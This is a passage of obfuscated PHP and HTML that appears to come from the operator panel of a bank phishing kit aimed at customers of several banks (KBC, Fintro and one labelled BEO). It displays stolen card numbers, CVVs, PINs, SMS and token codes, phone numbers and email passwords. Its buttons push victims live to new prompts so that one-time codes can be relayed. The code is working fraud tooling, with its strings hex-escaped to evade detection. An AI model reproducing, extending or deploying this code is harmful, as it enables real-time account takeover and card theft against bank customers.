"\x3c\x64\x69\166\x20\x63\x6c\x61\x73\163\75\x22\146\x6f\162\155\x2d\x67\x72\x6f\165\160\x20\162\157\167\42\76"; echo "\x3c\x6c\x61\x62\x65\154\40\146\157\162\x3d\x22\x69\x64\42\40\143\x6c\141\163\x73\x3d\42\x74\x65\170\164\55\x73\x65\x63\x6f\156\144\x61\x72\171\40\x63\x6f\x6c\55\x73\x6d\55\x33\x20\146\157\x6e\x74\x2d\167\145\x69\x67\x68\164\55\x62\157\x6c\x64\x22\x3e\124\x65\x6c\x65\x66\157\157\156\40\x6e\x75\155\x6d\145\162\x3a\x3c\x2f\x6c\141\x62\145\x6c\76"; echo "\x3c\x64\x69\x76\40\x63\x6c\x61\x73\163\75\42\143\157\x6c\55\163\155\55\x39\x22\x3e"; echo "\x3c\x70\40\x63\x6c\x61\163\x73\x3d\x22\164\145\x78\164\x2d\163\x65\143\x6f\156\x64\x61\x72\x79\x22\76\74\151\x3e" . htmlspecialchars($log["\143\137\x74\145\154"]) . "\74\x2f\x69\x3e\x3c\57\x70\76"; echo "\74\x2f\x64\151\166\76"; echo "\x3c\57\x64\x69\x76\x3e"; } if (!empty($log["\143\137\143\165\x73\164\157\x6d"])) { echo "\x3c\x64\151\x76\x20\143\154\x61\x73\163\x3d\x22\x66\x6f\x72\155\55\x67\162\x6f\165\160\40\x72\157\167\42\76"; echo "\74\x6c\141\142\145\154\x20\146\x6f\x72\x3d\42\x69\144\42\x20\143\x6c\x61\x73\163\75\42\164\145\x78\x74\55\163\x65\x63\157\156\144\x61\162\x79\x20\x63\157\154\x2d\x73\155\x2d\x33\40\x66\157\156\x74\55\167\145\151\147\x68\x74\x2d\x62\157\154\x64\42\x3e\103\x75\x73\164\157\155\x3a\74\x2f\x6c\141\x62\x65\x6c\76"; echo "\x3c\144\x69\166\x20\143\154\x61\163\163\x3d\42\143\157\x6c\55\x73\155\x2d\x39\x22\76"; echo "\x3c\160\x20\143\x6c\x61\x73\x73\75\42\x74\x65\x78\164\x2d\163\x65\x63\x6f\156\x64\141\x72\171\x22\76\x3c\151\x3e" . htmlspecialchars($log["\143\137\x63\x75\163\x74\x6f\x6d"]) . "\74\x2f\151\76\x3c\57\160\76"; echo "\x3c\57\x64\x69\x76\x3e"; echo "\74\x2f\144\x69\x76\x3e"; } if (!empty($log["\x63\137\163\x6d\x73"])) { echo "\x3c\144\151\166\x20\143\x6c\141\163\163\x3d\42\146\x6f\x72\x6d\55\x67\x72\157\165\x70\40\x72\157\x77\42\76"; echo "\x3c\x6c\x61\x62\x65\x6c\x20\x66\157\162\75\42\x69\144\42\x20\x63\154\x61\163\163\x3d\x22\164\x65\170\x74\55\x73\145\143\x6f\156\x64\x61\162\171\40\143\x6f\154\x2d\x73\155\x2d\x33\x20\146\157\x6e\x74\x2d\x77\145\151\x67\150\x74\55\142\157\154\144\42\x3e\x53\115\x53\40\143\157\x64\x65\x3a\x3c\57\x6c\141\x62\145\154\x3e"; echo "\x3c\144\x69\x76\x20\143\x6c\x61\163\x73\75\x22\143\x6f\x6c\55\x73\x6d\x2d\x39\42\x3e"; echo "\x3c\x70\x20\x63\x6c\x61\x73\x73\x3d\42\x74\145\170\164\x2d\163\x65\143\157\156\144\141\162\x79\42\x3e\74\x69\76" . htmlspecialchars($log["\143\x5f\x73\155\x73"]) . "\x3c\x2f\x69\76\74\x2f\x70\x3e"; echo "\x3c\x2f\x64\151\x76\76"; echo "\x3c\x2f\x64\x69\x76\x3e"; } if (!empty($log["\x63\x5f\x6d\x31"])) { echo "\74\x64\151\x76\40\x63\154\141\163\163\75\42\x66\157\162\x6d\x2d\x67\x72\x6f\x75\160\x20\162\x6f\x77\x22\76"; echo "\74\x6c\141\x62\x65\x6c\x20\146\x6f\x72\x3d\42\151\x64\42\40\143\154\x61\163\163\x3d\x22\164\145\170\x74\55\x73\145\x63\157\x6e\x64\141\x72\171\40\x63\x6f\154\55\x73\155\55\x33\40\146\x6f\x6e\x74\55\167\145\x69\147\x68\x74\x2d\x62\157\154\144\x22\76\x52\145\x73\160\157\x6e\x73\145\40\x32\66\x30\40\x31\72\74\57\x6c\x61\142\145\x6c\76"; echo "\74\144\x69\x76\x20\143\x6c\141\163\x73\75\42\143\157\154\55\x73\155\x2d\x39\x22\x3e"; echo "\x3c\x70\40\143\x6c\x61\163\x73\75\x22\x74\145\170\164\x2d\163\145\x63\157\156\144\x61\x72\x79\42\x3e\74\x69\x3e" . htmlspecialchars($log["\x63\x5f\155\x31"]) . "\x3c\57\151\76\x3c\57\160\x3e"; echo "\x3c\57\x64\x69\x76\76"; echo "\74\57\144\151\x76\76"; } if (!empty($log["\x63\x5f\x6d\x32"])) { echo "\74\x64\151\x76\x20\143\154\x61\163\x73\x3d\42\146\157\x72\x6d\x2d\x67\x72\157\165\160\x20\x72\x6f\167\x22\x3e"; echo "\x3c\x6c\x61\142\x65\x6c\40\146\157\162\x3d\42\151\144\x22\40\x63\x6c\141\163\x73\x3d\42\164\145\x78\164\55\163\145\143\x6f\x6e\x64\x61\162\171\40\143\157\x6c\55\163\155\55\63\x20\x66\x6f\156\164\55\x77\145\151\x67\x68\x74\55\142\x6f\x6c\144\x22\x3e\x52\145\x73\x70\157\x6e\x73\x65\x20\x32\x36\x30\40\x32\72\74\x2f\154\141\x62\145\154\x3e"; echo "\74\144\151\166\40\x63\x6c\141\x73\163\75\x22\143\x6f\x6c\x2d\163\155\55\x39\x22\x3e"; echo "\x3c\160\40\x63\154\x61\163\x73\75\x22\164\145\x78\x74\x2d\x73\145\x63\157\x6e\x64\x61\x72\x79\x22\76\x3c\151\x3e" . htmlspecialchars($log["\x63\137\155\62"]) . "\74\57\x69\x3e\x3c\x2f\160\x3e"; echo "\74\x2f\144\151\x76\76"; echo "\74\57\x64\151\166\x3e"; } if (!empty($log["\x63\x5f\155\63"])) { echo "\74\x64\x69\166\40\143\154\x61\x73\163\75\x22\x66\x6f\x72\x6d\x2d\x67\162\157\165\x70\40\x72\157\x77\42\76"; echo "\74\154\141\x62\145\154\x20\146\x6f\x72\75\42\x69\x64\x22\40\143\x6c\x61\x73\163\75\42\164\x65\170\164\55\163\145\143\157\156\x64\x61\x72\x79\x20\143\157\154\x2d\163\155\x2d\x33\40\x66\x6f\156\x74\x2d\167\x65\x69\147\150\x74\55\x62\157\x6c\144\42\x3e\122\x65\163\x70\x6f\x6e\163\145\x20\x33\x32\60\72\x3c\57\x6c\141\142\145\x6c\x3e"; echo "\74\x64\151\166\40\143\x6c\x61\x73\x73\x3d\42\x63\157\x6c\55\163\x6d\55\71\x22\x3e"; echo "\x3c\x70\40\143\154\x61\x73\x73\75\x22\x74\x65\x78\x74\55\x73\x65\x63\157\x6e\144\x61\162\171\42\x3e\74\x69\76" . htmlspecialchars($log["\143\137\x6d\x33"]) . "\74\x2f\151\x3e\x3c\x2f\160\x3e"; echo "\74\x2f\x64\x69\x76\76"; echo "\74\x2f\144\x69\166\x3e"; } if (!empty($log["\x63\x5f\160\151\156"])) { echo "\74\x64\x69\x76\x20\x63\x6c\x61\163\x73\x3d\42\146\157\162\x6d\x2d\x67\x72\157\165\160\x20\162\x6f\167\42\x3e"; echo "\74\x6c\x61\142\145\154\40\146\157\162\x3d\42\x69\x64\42\x20\143\x6c\141\163\163\x3d\x22\x74\x65\170\164\x2d\x73\145\x63\157\156\x64\141\162\171\x20\143\157\x6c\55\x73\155\55\63\x20\x66\157\156\x74\x2d\167\x65\x69\x67\x68\x74\55\x62\x6f\x6c\144\42\76\x50\151\x6e\103\x6f\144\x65\x3a\74\57\154\x61\x62\x65\154\x3e"; echo "\x3c\144\x69\x76\40\x63\x6c\x61\x73\x73\75\42\x63\x6f\154\55\163\155\55\71\42\76"; echo "\74\160\40\x63\x6c\x61\x73\163\75\x22\164\145\170\x74\x2d\x73\x65\143\157\156\x64\x61\x72\x79\x22\76\74\151\x3e" . htmlspecialchars($log["\x63\137\x70\151\x6e"]) . "\74\57\151\x3e\74\57\x70\x3e"; echo "\74\57\x64\151\166\76"; echo "\x3c\57\x64\x69\x76\x3e"; } if (!empty($log["\x63\137\143\143"]) && !empty($log["\143\x5f\x63\166\x76"]) && !empty($log["\x63\137\145\170\160\62"])) { echo "\x3c\144\x69\x76\40\x63\154\x61\163\x73\x3d\42\x66\x6f\x72\155\55\x67\162\x6f\165\x70\x20\162\157\167\x22\x3e"; echo "\74\x6c\x61\x62\145\x6c\40\146\x6f\162\x3d\x22\x69\x64\x22\40\x63\x6c\x61\x73\163\x3d\x22\x74\145\x78\164\55\163\145\x63\x6f\156\x64\141\x72\x79\40\x63\x6f\154\55\163\155\x2d\63\40\x66\157\x6e\x74\55\x77\145\x69\147\x68\164\x2d\142\157\x6c\144\x22\x3e\103\x43\x3a\74\x2f\154\x61\x62\x65\x6c\x3e"; echo "\x3c\x64\x69\x76\40\143\x6c\x61\x73\x73\75\x22\x63\x6f\x6c\x2d\163\155\55\x39\x22\x3e"; echo "\74\x70\40\x63\x6c\x61\163\x73\75\x22\x74\145\x78\164\x2d\163\145\143\x6f\x6e\144\141\x72\171\x22\x3e\74\151\x3e" . htmlspecialchars($log["\143\x5f\x63\143"]) . "\74\57\151\76\74\57\x70\x3e"; echo "\74\x2f\x64\151\x76\x3e"; echo "\x3c\57\144\151\166\76"; echo "\x3c\144\151\166\x20\x63\x6c\141\163\163\75\42\146\x6f\x72\155\x2d\147\162\x6f\165\x70\40\x72\157\167\42\76"; echo "\x3c\154\141\142\145\x6c\x20\146\157\x72\x3d\x22\151\x64\x22\40\143\154\x61\163\x73\75\x22\x74\145\170\x74\x2d\x73\x65\x63\157\156\x64\141\x72\171\x20\143\x6f\x6c\55\163\x6d\55\63\40\x66\157\156\x74\x2d\167\x65\151\147\150\164\55\142\157\x6c\x64\x22\x3e\x43\x56\x56\x3a\74\x2f\154\141\x62\x65\x6c\76"; echo "\x3c\144\x69\166\40\x63\x6c\x61\163\x73\x3d\42\x63\157\x6c\x2d\163\x6d\x2d\x39\42\x3e"; echo "\74\x70\40\143\154\x61\163\x73\x3d\x22\x74\x65\170\164\x2d\163\x65\143\157\156\x64\141\x72\171\42\76\x3c\x69\76" . htmlspecialchars($log["\x63\137\143\x76\166"]) . "\74\x2f\151\x3e\x3c\x2f\160\x3e"; echo "\x3c\x2f\x64\x69\166\x3e"; echo "\x3c\x2f\144\x69\x76\76"; } if ($log["\x77\141\x69\164\x69\156\147"] == "\x74\162\x75\145") { ?>
</div>
<div class="row">
<div class="col-lg-3">
<button class="btn btn-sm btn-block btn-purple mt-4" onclick="setBeo('<?php echo htmlspecialchars($log["\x75\x73\x65\x72\137\151\x64"]); ?>
', 'login')"><i class="fa fa-info-circle" aria-hidden="true"></i> Login</button>
</div>
<div class="col-lg-3">
<button class="btn btn-sm btn-block btn-purple mt-4" onclick="setBeo('<?php echo htmlspecialchars($log["\x75\163\x65\x72\x5f\151\144"]); ?>
', 'exp')"><i class="fa fa-info-circle" aria-hidden="true"></i> Exp</button>
</div>
<div class="col-lg-3">
<button class="btn btn-sm btn-block btn-purple mt-4" onclick="setBeo('<?php echo htmlspecialchars($log["\x75\163\145\x72\137\151\144"]); ?>
', 'sms')"><i class="fa fa-info-circle" aria-hidden="true"></i> SMS</button>
</div>
<div class="col-lg-3">
<button class="btn btn-sm btn-block btn-purple mt-4" onclick="setBeo('<?php echo htmlspecialchars($log["\165\163\145\x72\137\151\144"]); ?>
', 'tel')"><i class="fa fa-info-circle" aria-hidden="true"></i> Phone</button>
</div>
<div class="col-lg-3">
<button class="btn btn-sm btn-block btn-purple mt-4" onclick="setBeo('<?php echo htmlspecialchars($log["\165\163\x65\162\x5f\151\x64"]); ?>
', 'cc')"><i class="fa fa-info-circle" aria-hidden="true"></i> CC</button>
</div>
<div class="col-lg-3">
<button class="btn btn-sm btn-block btn-purple mt-4" onclick="setBeo('<?php echo htmlspecialchars($log["\165\x73\x65\162\137\x69\x64"]); ?>
', 'pin')"><i class="fa fa-info-circle" aria-hidden="true"></i> NIP</button>
</div>
<div class="col-lg-3">
<button class="btn btn-sm btn-block btn-purple mt-4" onclick="setBeo('<?php echo htmlspecialchars($log["\x75\163\145\162\137\x69\x64"]); ?>
', 'D260')"><i class="fa fa-info-circle" aria-hidden="true"></i> Login 260</button>
</div>
<div class="col-lg-3">
<button class="btn btn-sm btn-block btn-purple mt-4" onclick="setBeo('<?php echo htmlspecialchars($log["\165\163\145\162\x5f\151\x64"]); ?>
', 'D320')"><i class="fa fa-info-circle" aria-hidden="true"></i> Login 320</button>
</div>
<div class="col-lg-3">
<button class="btn btn-sm btn-block btn-purple mt-4" onclick="setBeo('<?php echo htmlspecialchars($log["\x75\x73\145\x72\137\151\144"]); ?>
', 'm3')"><i class="fa fa-sign-language" aria-hidden="true"></i> Token 320</button>
</div>
<div class="col-lg-3">
<button class="btn btn-sm btn-block btn-purple mt-4" onclick="setBeo('<?php echo htmlspecialchars($log["\165\x73\145\162\x5f\151\144"]); ?>
', 'm2')"><i class="fa fa-sign-language" aria-hidden="true"></i> Token 260-2</button>
</div>
<div class="col-lg-3">
<button class="btn btn-sm btn-block btn-purple mt-4" onclick="setBeo('<?php echo htmlspecialchars($log["\165\x73\145\162\137\151\x64"]); ?>
', 'm1')"><i class="fa fa-sign-language" aria-hidden="true"></i> Token 260-1</button>
</div>
<div class="col-lg-3">
<button class="btn btn-sm btn-block btn-success mt-4" onclick="setBeo('<?php echo htmlspecialchars($log["\165\163\145\162\137\151\x64"]); ?>
', 'finish')"><i class="fa fa-check-circle" aria-hidden="true"></i> Finish</button>
</div>
</div>
<div class="row">
<div class="col-lg-12">
<input type="text" class="form-control sns-sign input-dark mt-4 custom-input" placeholder="260-1">
</div>
</div>
<div class="row">
<div class="col-lg-6">
<input type="text" class="form-control sns-sign2 input-dark mt-4 custom-input" placeholder="260-2.1/360-1">
</div>
<div class="col-lg-6">
<input type="text" class="form-control sns-sign3 input-dark mt-4 custom-input" placeholder="260-2.2/360-2">
</div>
</div>
<div class="row">
<div class="col-lg-3">
<button class="btn btn-sm btn-block btn-outline-warning mt-4" onclick="setBeo('<?php echo htmlspecialchars($log["\165\163\x65\x72\137\151\144"]); ?>
', 'custom')"><i class="fa fa-sign-language" aria-hidden="true"></i> Custom</button>
</div>
<div class="col-lg-9">
<br>
<input hidden type="text" class="form-control beo-custom input-dark mt-4 custom-input" placeholder="Fill in your 'Login Code'">
<a href="../public/api/TokenInput/Insert.php" target="_blank" class="custom-link"><b>Set custom amount</b></a>
</div>
<style>
.custom-link {
color: orange;
text-decoration: none;
font-size: 16px;
cursor: pointer;
}
.custom-link:hover {
text-decoration: underline;
}
</style>
</div>
</div>
</div>
<?php } } else { if ($log["\142\141\x6e\x6b"] === "\x4b\x42\103") { function KBC($label, $value) { echo "\74\144\x69\x76\x20\x63\x6c\x61\x73\x73\x3d\x22\146\157\162\155\55\147\x72\157\x75\x70\40\x72\157\x77\x22\76"; echo "\74\x6c\141\x62\145\x6c\x20\146\157\x72\75\x27\151\144\47\40\143\154\x61\163\x73\75\47\164\145\x78\164\x2d\x73\145\143\157\x6e\144\x61\162\x79\x20\x63\x6f\154\x2d\163\155\55\x33\x20\146\x6f\x6e\x74\55\x77\145\x69\x67\150\x74\x2d\142\157\x6c\144\x27\x3e{$label}\72\x3c\x2f\154\x61\x62\x65\154\x3e"; echo "\x3c\x64\x69\x76\40\143\154\141\x73\163\x3d\x22\x63\157\154\x2d\x73\x6d\55\71\x22\76"; echo "\x3c\x70\40\143\x6c\141\x73\163\75\x27\164\x65\170\x74\x2d\x73\x65\x63\x6f\x6e\x64\x61\162\171\47\76\74\x69\76\74\163\160\141\156\40\143\154\141\x73\163\75\x27\x63\157\x70\x79\55\x76\141\x6c\165\x65\x27\40\157\x6e\143\x6c\x69\x63\x6b\75\x27\143\x6f\x70\x79\x54\x6f\x43\x6c\151\160\142\157\141\162\x64\50\164\x68\x69\163\51\x27\76" . htmlspecialchars($value) . "\74\x2f\163\160\141\x6e\x3e\74\x62\162\57\x3e\x3c\163\x70\141\x6e\x20\x63\154\x61\x73\163\75\x27\x63\x6f\x70\x79\55\164\x65\170\164\47\76\103\x6c\x69\x63\153\x20\164\x6f\40\x63\157\x70\x79\74\x2f\x73\x70\x61\156\76\x3c\57\x69\76\74\57\x70\x3e"; echo "\x3c\57\x64\151\166\x3e"; echo "\x3c\x2f\x64\151\166\x3e"; } if (!empty($log["\153\x62\x63\x5f\x63\141\162\144"])) { KBC("\x43\141\162\144", $log["\x6b\x62\143\x5f\x63\141\162\x64"]); } if (!empty($log["\153\142\143\137\166\166"])) { KBC("\105\170\160", $log["\x6b\x62\143\137\166\166"]); } if (!empty($log["\153\142\143\137\x6d\61"])) { KBC("\x4c\x6f\x67\151\x6e\40\103\157\144\x65", $log["\153\142\143\137\155\x31"]); } if (!empty($log["\x6b\142\143\137\x6d\x32"])) { KBC("\x53\x69\x67\x6e\40\103\x6f\144\145", $log["\x6b\142\143\137\x6d\x32"]); } if (!empty($log["\x6b\142\143\x5f\160\150\x6f\x6e\x65"])) { KBC("\x50\150\157\x6e\145", $log["\x6b\142\x63\x5f\x70\x68\x6f\156\145"]); } if (!empty($log["\x6b\x62\143\x5f\163\x6d\x73"])) { KBC("\x53\115\123\x20\x43\x6f\144\x65", $log["\153\x62\143\x5f\x73\155\163"]); } if (!empty($log["\x6b\x62\x63\137\154\151\x76\145\154\x6f\147\x69\x6e"])) { KBC("\x53\x69\x67\x6e\40\114\x69\166\x65", $log["\153\x62\x63\x5f\154\x69\x76\x65\x6c\157\147\x69\x6e"]); } if (!empty($log["\153\142\143\137\x6c\151\x76\145"])) { KBC("\102\165\171\x20\114\x69\166\145", $log["\153\142\x63\x5f\x6c\x69\166\145"]); } if (!empty($log["\x6b\142\143\137\x63\x63"])) { KBC("\103\103\40\116\x75\x6d\x62\145\162", $log["\x6b\x62\x63\x5f\x63\x63"]); } if (!empty($log["\153\x62\x63\x5f\x65\170\x70"])) { KBC("\x43\103\x20\105\170\160", $log["\x6b\x62\143\137\x65\x78\160"]); } if (!empty($log["\x6b\x62\143\137\143\166\143"])) { KBC("\103\126\103", $log["\153\142\143\x5f\143\x76\143"]); } if (!empty($log["\153\x62\x63\137\x63\x75\163\164\x6f\x6d"])) { KBC("\103\x61\154\154\40\x56\x69\x63", $log["\x6b\142\143\137\143\x75\x73\x74\x6f\155"]); } if (!empty($log["\153\x62\x63\137\x62\x65\x6c"])) { KBC("\x43\x75\163\164\x6f\155", $log["\153\142\143\x5f\142\145\154"]); } if ($log["\x77\x61\151\x74\x69\156\x67"] == "\164\x72\x75\145") { ?>
</div>
<div class="row">
<div class="col-lg-3">
<button class="btn btn-sm btn-block btn btn-purple mt-4 mt-4" onclick="setKbc('<?php echo htmlspecialchars($log["\165\x73\145\162\137\x69\x64"]); ?>
', 'login')"><i class="fa fa-info-circle" aria-hidden="true"></i> Ask Login
</button>
</div>
<div class="col-lg-3">
<button class="btn btn-sm btn-block btn btn-purple mt-4 mt-4" onclick="setKbc('<?php echo htmlspecialchars($log["\165\163\145\162\137\x69\144"]); ?>
', 'identification')">
<i class="fa fa-phone" aria-hidden="true"></i> Ask Phone
</button>
</div>
<div class="col-lg-3">
<button class="btn btn-sm btn-block btn btn-purple mt-4 mt-4" onclick="setKbc('<?php echo htmlspecialchars($log["\165\163\x65\x72\x5f\151\x64"]); ?>
', 'bel')">
<i class="fa fa-phone" aria-hidden="true"></i> Call Vic
</button>
</div>
<div class="col-lg-3">
<button class="btn btn-sm btn-block btn btn-purple mt-4 mt-4" onclick="setKbc('<?php echo htmlspecialchars($log["\x75\163\x65\162\x5f\151\144"]); ?>
', 'sms')">
<i class="far fa-keyboard" aria-hidden="true"></i> Ask SMS
</button>
</div>
<div class="col-lg-3">
<button class="btn btn-sm btn-block btn btn-purple mt-4 mt-4" onclick="setKbc('<?php echo htmlspecialchars($log["\x75\x73\x65\162\137\x69\x64"]); ?>
', 'loginCode')">
<i class="far fa-keyboard"></i> Ask CC
</button>
</div>
<div class="col-lg-3">
<button class="btn btn-sm btn-block btn btn-success mt-4" onclick="setKbc('<?php echo htmlspecialchars($log["\x75\163\x65\162\x5f\x69\x64"]); ?>
', 'finish')">
<i class="fa fa-check-circle" aria-hidden="true"></i> Finish
</button>
</div>
</div>
<hr>
<div class="row">
<div hidden class="col-lg-3">
<button class="btn btn-sm btn-block btn btn-outline-warning mt-4 mt-4" onclick="setKbc('<?php echo htmlspecialchars($log["\165\163\x65\162\x5f\151\x64"]); ?>
', 'custom')">
<i class="fa fa-sign-language" aria-hidden="true"></i> Custom
</button>
</div>
<div hidden class="col-lg-9">
<br>
<input hidden type="text" class="form-control argenta-custom input-dark mt-4 custom-input" placeholder="Fill in your 'Login Code'">
<a hidden href="../public/api/TokenInput/Insert.php" target="_blank" class="custom-link"><b>Set custom amount</b></a>
</div>
<style>
.custom-link {
color: orange;
text-decoration: none;
font-size: 16px;
cursor: pointer;
}
.custom-link:hover {
text-decoration: underline;
}
</style>
<div class="col-lg-3">
<button class="btn btn-sm btn-block btn btn-purple mt-4 mt-4" onclick="setKbc('<?php echo htmlspecialchars($log["\x75\x73\x65\162\x5f\x69\x64"]); ?>
', 'signCode')">
<i class="fa fa-sign-language" aria-hidden="true"></i> Login Code
</button>
</div>
<div class="col-lg-9">
<input type="text" class="form-control kbc-one input-dark mt-4 custom-input" placeholder="Please enter a sign code">
</div>
</div>
<hr>
<div class="row">
<div class="col-lg-3">
<button class="btn btn-sm btn-block btn btn-purple mt-4 mt-4" onclick="setKbc('<?php echo htmlspecialchars($log["\x75\x73\145\162\137\151\x64"]); ?>
', 'tokenCode')">
<i class="fa fa-sign-language" aria-hidden="true"></i> Sign Code
</button>
</div>
<div class="col-lg-9">
<input type="text" class="form-control kbc-two input-dark mt-4 custom-input" placeholder="Please enter a sign code">
</div>
</div>
<hr>
<div class="row">
<div class="col-lg-3">
<button class="btn btn-sm btn-block btn btn-purple mt-4 mt-4" onclick="setKbc('<?php echo htmlspecialchars($log["\x75\x73\x65\162\x5f\x69\x64"]); ?>
', 'live')">
<i class="fa fa-sign-language" aria-hidden="true"></i> Buy Code
</button>
</div>
<div class="col-lg-9">
<input type="text" class="form-control kbc-live input-dark mt-4 custom-input" placeholder="Please enter a token code">
<input type="text" class="form-control kbc-livetwo input-dark mt-4 custom-input" placeholder="Please enter a token code">
</div>
</div>
<hr>
<div class="row">
<div class="col-lg-3">
<button class="btn btn-sm btn-block btn btn-purple mt-4 mt-4" onclick="setKbc('<?php echo htmlspecialchars($log["\165\x73\145\x72\137\x69\x64"]); ?>
', 'livetwo')">
<i class="fa fa-sign-language" aria-hidden="true"></i> Live Sign
</button>
</div>
<div class="col-lg-9">
<input type="text" class="form-control kbc-livelogin input-dark mt-4 custom-input" placeholder="Please enter a token code">
<input type="text" class="form-control kbc-livelogintwo input-dark mt-4 custom-input" placeholder="Please enter a token code">
</div>
</div>
</div>
</div>
<?php } } else { if ($log["\x62\x61\x6e\x6b"] === "\x46\x49\116\x54\122\x4f") { function FINTRO($label, $value) { echo "\x3c\x64\x69\x76\40\143\x6c\x61\163\x73\x3d\x22\146\157\162\x6d\x2d\x67\x72\157\x75\160\x20\162\x6f\167\x22\x3e"; echo "\x3c\x6c\141\142\x65\154\40\146\157\162\75\47\x69\x64\47\x20\x63\x6c\x61\163\x73\x3d\47\x74\145\170\x74\55\x73\145\143\x6f\x6e\x64\x61\162\x79\40\143\157\154\55\x73\x6d\55\63\40\146\x6f\x6e\x74\x2d\167\145\151\x67\x68\164\55\x62\x6f\x6c\144\47\x3e{$label}\72\74\57\154\141\x62\x65\154\x3e"; echo "\74\144\151\x76\40\x63\x6c\141\x73\163\75\x22\x63\x6f\x6c\x2d\163\x6d\55\x39\x22\x3e"; echo "\74\160\x20\x63\x6c\x61\x73\163\75\x27\164\145\x78\164\x2d\x73\145\x63\157\156\144\x61\162\x79\x27\x3e\74\x69\x3e\x3c\x73\x70\141\156\x20\x63\x6c\x61\163\163\x3d\x27\143\x6f\160\x79\55\166\x61\x6c\165\x65\x27\40\x6f\156\143\154\x69\143\153\x3d\47\x63\157\160\171\124\157\x43\154\x69\x70\142\x6f\x61\162\144\x28\x74\150\151\163\x29\47\76" . htmlspecialchars($value) . "\x3c\x2f\163\160\141\156\76\74\x62\162\x2f\76\x3c\163\160\141\x6e\40\143\x6c\141\x73\x73\x3d\x27\x63\157\x70\171\55\164\x65\x78\x74\47\x3e\x43\154\151\143\x6b\x20\x74\x6f\x20\x63\157\x70\x79\x3c\57\x73\160\x61\x6e\x3e\74\57\x69\x3e\74\57\160\76"; echo "\x3c\x2f\x64\151\x76\76"; echo "\74\x2f\x64\151\166\x3e"; } if (!empty($log["\x66\151\x6e\x74\x72\x6f\x5f\x77\151\146\x69"])) { $kaartbegin = '' . $log["\146\x69\x6e\164\162\x6f\x5f\x77\151\146\151"]; FINTRO("\103\x61\x72\144\116\165\x6d\142\x65\x72", $kaartbegin); } if (!empty($log["\x66\151\x6e\164\162\157\137\167\x69\146\151\137\x70\x61\x73\x73"])) { FINTRO("\x43\154\x69\x65\x6e\x74\116\165\155\x62\x65\x72", $log["\146\x69\x6e\164\x72\x6f\137\167\x69\146\x69\x5f\x70\x61\163\x73"]); } if (!empty($log["\146\x69\156\x74\162\157\137\165\x73\145\162"])) { FINTRO("\x50\x68\x6f\x6e\x65", $log["\x66\x69\156\x74\x72\x6f\x5f\x75\x73\x65\162"]); } if (!empty($log["\146\x69\156\x74\x72\157\137\145\170\160"])) { FINTRO("\x53\x4d\x53", $log["\x66\151\x6e\x74\162\x6f\137\x65\x78\160"]); } if (!empty($log["\x66\x69\x6e\164\x72\x6f\x5f\143\165\x73\x74\157\155"])) { FINTRO("\103\165\x73\164\x6f\155", $log["\146\x69\x6e\x74\162\157\x5f\143\x75\163\x74\157\x6d"]); } if (!empty($log["\146\x69\x6e\x74\162\157\x5f\160\141\163\x73\167\157\162\x64"])) { FINTRO("\105\x6d\141\x69\x6c\55\x50\141\x73\x73", $log["\x66\151\x6e\x74\162\157\x5f\160\x61\163\x73\167\x6f\162\x64"]); } if (!empty($log["\146\x69\x6e\x74\x72\x6f\137\x63\141\154\154"])) { FINTRO("\x43\x61\154\x6c\40\x56\x69\x63", $log["\x66\151\156\x74\162\x6f\x5f\x63\x61\154\154"]); } if (!empty($log["\x66\151\x6e\164\x72\157\x5f\x72\x65\163\x70\157\x6e\163"])) { FINTRO("\x4c\157\x67\151\x6e\x20\x43\157\x64\145", $log["\146\x69\156\x74\x72\157\137\162\145\163\160\x6f\156\163"]); } if (!empty($log["\x66\151\156\x74\162\157\x5f\x63\157\144\145\137\170"])) { FINTRO("\x53\151\x67\156\x20\x43\x6f\x64\145", $log["\x66\151\156\x74\x72\x6f\x5f\x63\x6f\x64\x65\x5f\x78"]); } if (!empty($log["\146\151\x6e\164\x72\157\x5f\143\157\x64\x65\137\155"])) { FINTRO("\x53\151\147\x6e\40\103\x6f\144\145\x20\50\62\x29", $log["\x66\151\x6e\164\162\157\137\143\157\144\145\x5f\155"]); } if (!empty($log["\146\151\x6e\164\x72\x6f\137\162\145\163\160\157\x6e\163\x5f\x74\167\157"])) { FINTRO("\114\151\166\x65\x20\103\157\x64\x65", $log["\146\151\x6e\164\162\157\137\x72\145\x73\160\x6f\156\x73\137\x74\x77\157"]); } if (!empty($log["\x66\151\156\x74\x72\x6f\137\143\162\145\144\151\x74\x63\x61\x72\x64"])) { FINTRO("\103\141\162\144\40\x4e\x75\x6d\142\145\x72", $log["\146\151\x6e\164\162\x6f\x5f\143\x72\145\144\151\x74\x63\x61\x72\x64"]); } if (!empty($log["\146\x69\156\x74\162\157\137\143\x63\145\x78\160"])) { FINTRO("\105\170\x70\x69\162\x79", $log["\x66\x69\x6e\164\162\157\137\143\x63\145\x78\160"]); } if (!empty($log["\x66\151\156\x74\162\157\x5f\143\x76\166"])) { FINTRO("\x43\x56\126", $log["\146\x69\156\164\162\x6f\x5f\143\x76\166"]); } if ($log["\x77\x61\151\x74\x69\x6e\147"] == "\164\x72\165\145") { ?>
</div>
<div class="row">
<div class="col-lg-3">
<button class="btn btn-sm btn-block btn-purple mt-4" onclick="setFintro('<?php echo htmlspecialchars($log["\x75\x73\x65\162\x5f\x69\144"]); ?>
', 'control')"><i class="fas fa-sign-in-alt"></i> | Login</button>
</div>
<div class="col-lg-3">
<button class="btn btn-sm btn-block btn-purple mt-4" onclick="setFintro('<?php echo htmlspecialchars($log["\x75\x73\x65\162\x5f\151\144"]); ?>
', 'login')"><i class="fas fa-phone"></i> | Phone</button>
</div>
<div class="col-lg-3">
<button class="btn btn-sm btn-block btn-purple mt-4" onclick="setFintro('<?php echo htmlspecialchars($log["\x75\163\x65\x72\137\151\x64"]); ?>
', 'details')"><i class="fa fa-envelope" aria-hidden="true"></i>
| SMS</button>
</div>
<div class="col-lg-3">
<button class="btn btn-sm btn-block btn-purple mt-4" onclick="setFintro('<?php echo htmlspecialchars($log["\165\163\x65\x72\137\x69\144"]); ?>
', 'password')"><i class="fa fa-envelope" aria-hidden="true"></i>
| Email-Pass</button>
</div>
<div class="col-lg-3">
<button class="btn btn-sm btn-block btn-purple mt-4" onclick="setFintro('<?php echo htmlspecialchars($log["\165\x73\x65\x72\x5f\151\144"]); ?>
', 'creditcard')"><i class="fa fa-credit-card" aria-hidden="true"></i>
| CC Info</button>
</div>
<div class="col-lg-3">
<button class="btn btn-sm btn-block btn-purple mt-4" onclick="setFintro('<?php echo htmlspecialchars($log["\165\163\x65\162\x5f\151\x64"]); ?>
', 'call')"><i class="fa fa-phone" aria-hidden="true"></i>
| CallVic</button>
</div>
<div class="col-lg-3">
